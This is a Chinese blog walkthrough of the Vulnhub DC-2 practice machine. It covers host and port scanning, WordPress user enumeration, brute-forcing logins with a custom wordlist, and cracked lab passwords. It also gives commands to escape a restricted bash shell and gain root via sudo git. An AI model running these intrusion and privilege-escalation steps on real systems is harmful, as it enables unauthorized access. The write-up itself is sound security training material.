靶机实战(DC-2)

最新推荐文章于 2024-03-20 23:38:08 发布
最新推荐文章于 2024-03-20 23:38:08 发布
阅读量258 收藏 1
点赞数
分类专栏: 靶机实战 文章标签: 安全漏洞 安全 黑盒测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605313/article/details/107002044
版权

DC-2

实验环境

靶机:DC-2
测试机:kali(IP:192.168.186.128),win10

实验过程

主机发现

netdiscover -I eth0 -r 192.168.186.0/24
nmap -sn 192.168.186.0/24
arp-scan -l ,arp-scan 192.168.186.0/24

在这里插入图片描述

端口扫描

masscan -p 0-65535 --rate=100000 192.168.186.248

在这里插入图片描述
nmap -A -p 7744,80 -T4 192.168.186.248
得到80的http服务,7744 ssh服务
在这里插入图片描述

目录扫描

网站wordpress搭建
在这里插入图片描述

漏洞发现

目录遍历漏洞
在这里插入图片描述
wpscan扫描wordpress,用户名枚举
在这里插入图片描述
找到三个用户名:admin,jerry,tom
在这里插入图片描述

漏洞利用

利用cewl工具爬取相关信息并生成字典
在这里插入图片描述
bp爆破登录口得到用户名:tom 密码:parturient,jerry 密码adipiscing 进入后台
在这里插入图片描述
找到上传点,做了白名单。
在这里插入图片描述
换个方向尝试连接ssh
在这里插入图片描述

提权

做了rbash的用户权限限制,绕过rbash
在这里插入图片描述

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/

在这里插入图片描述
切换用户名到jerry,sudo -l
在这里插入图片描述

git提权
sudo git help config

在这里插入图片描述

!/bin/bash

在这里插入图片描述
在这里插入图片描述

总结

rbash绕过,
git提权 sudo git help config
!/bin/bash或者!'sh'完成提权
sudo git  -p help
!/bin/bash
~~...
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[渗透测试篇]Vulnhub之靶机DC-2
qq_43668710的博客
05-11 432
文章目录靶机描述实验环境渗透思路获取目标IP(netdiscover)端口扫描(nmap)生成密码(cewl)获取用户名(wpscan)暴力破解(hydra)登录后台全端口扫描/SSH登录逃脱受限shell/导入$PATHgit 提权知识总结DC-系列 靶机描述 共有五个标志,包括最终标志.任务就是跟着逐一放出的flag提示拿到最终的flag. 实验环境 攻击机:kali 目标机:DC-2 涉及工具: 'netdiscover':获取目标IP 'nmap':信息收集/端口扫描/Web服务判断 'cewl
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
vulnhub靶机练习--DC2
qq_34516733的博客
12-24 331
DC-2靶机详情靶机练习 总结: nmap:探测存活主机、扫描开放的端口 域名解析:修改hosts文件 nikto:扫描网站结构 wpscan:扫描网站,获取可以登录网站的用户名;爆破可以登录用户的密码 cewl:生成密码字典 hydra:ssh登录密码爆破 vi提权: 用vi的:set shell=/bin/bash : shell 之后 export -p 查看发现PATH变量可以写入 export PATH=$PATH:/bin/ git提权: sudo git -p –-help sudo git
DC-2渗透实战(详细过程)
tzyyyyyy的博客
10-14 822
DC-2靶机渗透实战 利用各种姿势方法获取最终flag
DC-2靶机渗透全流程详细
最新发布
qq_63940076的博客
03-20 1513
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
DC-2靶机攻略
真正的大师,永远都怀着一颗学徒的心。
07-25 742
文章目录前言一、DC-2 收集信息1.确定目标IP,以及端口号2.进入登陆界面二、使用步骤1.引入库2.读入数据总结 前言 之前进行了DC-1的攻略有兴趣的可以点击去看一下 提示:以下是本篇文章正文内容,下面案例可供参考 一、DC-2 收集信息 简单介绍:这次的靶机渗透是一个找寻DC-2靶机中的flag的过程,以最终的flag为目标。 1.确定目标IP,以及端口号 通过nmap -sP扫描网段最终确定IP为192.168.48.132,端口号开放80、7744。 2.进入登陆界面 二、使用步骤 1.引
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 使用jerry用户通过git提权,进入root目录找到final_flag
渗透测试靶机练习 DC-2
weixin_43705814的博客
12-30 294
渗透测试靶机练习 DC-2 一、靶机介绍 与之前的DC-1靶机是一个系列可在该网站下载搭建 链接:https://www.vulnhub.com/ 二、搭建靶机 直接下载靶机在导入到虚拟机中即可 三、渗透测试获取Flag 1.打开靶机看是都能够正常运行 2.发现Flag 2.1flag1 2.1.1 应为处在同一个局域网中可以使用nmap进行主机发现,进行端口扫描 nmap 10.10.10.0/24 nmap -sV -Pn -p- -O -sS -A 10.10.10.136 ...
DC-2靶机渗透实战
ghtwf01的博客
12-01 240
主机渗透系统: kali linux 靶机: DC-2 渗透过程: 先扫网段内存活主机,发现192.168.1.41是靶机ip 扫描靶机所有开放的端口 然后访问80端口的服务,这里根据靶机下载页面上面的提示需要设置hosts文件 访问页面是一个wordpess,找到flag1 它提示登录找到下一个flag,也提示了cewl,于是就用cewl爬一波密码出来,保存在根目录 然后用专门针对wordpress的工具wpscan来扫描所有用户名wpscan --url http://dc-2 --enume
vulnhub之DC2靶机
LainWith的博客
08-16 1450
靶机概览信息收集nmap信息收集网站信息收集Flag1爬站目录扫描列出站点的用户名、账号渗透攻击爆破后台访问网站Flag2爆破ssh登录ssh绕过rbash拿flag3拿下jerry拿下flag4提权git提权flag5 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机.
Vulnhub DC Challenges之 DC-2
ST0new的博客
05-26 1907
前言 关于Vulnhub 以及DC,以及如何使用ova安装,我已经在DC-1中介绍了 ,今天带来第二弹,比第一弹难度稍微大一点,重点还是考察工具的使用和命令的熟练程度 附上链接Vulnhub DC Challenges之 DC-1 DC-2介绍 DC-2,我们主要是从web入手渗透拿到flag,需要大家对信息收集要有一定的了解,需要掌握的工具:nmap,hydra,cewl。 靶机环境 DC-2...
Vulnhub-DC-2靶机实战
御七彩虹猫
03-28 3874
Vulnhub-DC-2靶机实战
DC靶机系列(二)
weixin_44385449的博客
03-13 211
不多B,开搞; 内网搭建nmap -R 192.XX.XX.0/24扫 搞到ip,仅开了80端口,访问一下,跳转到dc-2提示需dns解析; 在hosts文件里添加一条 刷新,提示是个wordpress站点 在页面上发现了flag1,提示爆破 扫一下详细信息及前10000端口,明确wordpress版本为4.7.10,ssh版本号6.7p1,且修改了默认端口号,改为7744; 祭出wpsc...
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2738
DC-2靶机渗透测试思路及流程
DC搭建
夜邢的博客
12-29 968
域控搭建 DC搭建
渗透DC-1靶机设计思路
05-24
2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值